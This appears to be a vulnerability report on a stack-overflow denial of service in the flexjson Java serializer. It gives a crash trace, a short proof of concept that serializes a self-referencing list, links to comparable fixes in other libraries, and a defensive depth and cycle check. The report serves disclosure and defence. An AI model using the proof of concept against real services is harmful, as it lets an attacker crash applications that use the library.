Stack overflow error caused by flexjson serialization List
Brought to you by: charliehubbard
flexjson before v3.3 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

    Exception in thread "main" java.lang.StackOverflowError
        at java.base/java.util.Stack.push(Stack.java:67)
        at flexjson.JSONContext.pushTypeContext(JSONContext.java:140)
        at flexjson.JSONContext.writeOpenArray(JSONContext.java:268)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:24)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)
        at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
        at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
        at flexjson.JSONContext.transform(JSONContext.java:72)

    <dependency>
        <groupId>net.sf.flexjson</groupId>
        <artifactId>flexjson</artifactId>
        <version>3.3</version>
    </dependency>
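
    import flexjson.JSONSerializer;
    import java.util.ArrayList;

    public class PoC3 {
        public static void main(String[] args) {
            // The list holds a reference to itself, so the object graph is cyclic.
            ArrayList<Object> list = new ArrayList<>();
            list.add(list);
            // deepSerialize recurses into the list without end and throws StackOverflowError.
            String s = new JSONSerializer().deepSerialize(list);
        }
    }
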
Refer to the jackson-databind solution: add a depth variable that records the current parsing depth, and throw an exception if the depth exceeds a certain threshold. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
Refer to the GSON solution: change the recursive processing of deeply nested arrays or JSON objects to stack-plus-iteration processing. (https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027)
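
A caller-side guard in the spirit of the depth-limit fix suggested above, added here as an example; it is not flexjson code and not part of the original report. The class name `NestingGuard` and the threshold of 64 are assumptions, and only `Map` and `Iterable` containers are followed, not bean fields.

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.IdentityHashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;

/** Rejects cyclic or overly deep containers before they reach a recursive serializer. */
public class NestingGuard {
    static final int MAX_DEPTH = 64; // assumed threshold, tune per application

    public static void check(Object root) {
        // Identity-based set: calling hashCode() on a self-containing list would itself recurse.
        Set<Object> path = Collections.newSetFromMap(new IdentityHashMap<>());
        walk(root, 0, path);
    }

    private static void walk(Object node, int depth, Set<Object> path) {
        Iterable<?> children;
        if (node instanceof Map) {
            children = ((Map<?, ?>) node).values();
        } else if (node instanceof Iterable) {
            children = (Iterable<?>) node;
        } else {
            return; // scalars and other objects are not followed here
        }
        if (depth >= MAX_DEPTH) {
            throw new IllegalArgumentException("nesting deeper than " + MAX_DEPTH);
        }
        if (!path.add(node)) { // this exact instance is already on the current path
            throw new IllegalArgumentException("container contains itself at depth " + depth);
        }
        for (Object child : children) {
            walk(child, depth + 1, path); // recursion is bounded by MAX_DEPTH
        }
        path.remove(node); // leaving this branch; shared but acyclic references stay legal
    }

    public static void main(String[] args) {
        List<Object> nested = new ArrayList<>();
        nested.add(new ArrayList<>(List.of(1, 2, 3))); // constructed well-formed input
        check(nested);

        List<Object> cyclic = new ArrayList<>();
        cyclic.add(cyclic); // same shape as the PoC input
        try {
            check(cyclic);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Calling `NestingGuard.check(value)` before `deepSerialize(value)` turns the uncatchable-in-practice `StackOverflowError` into an ordinary exception the application can handle and log.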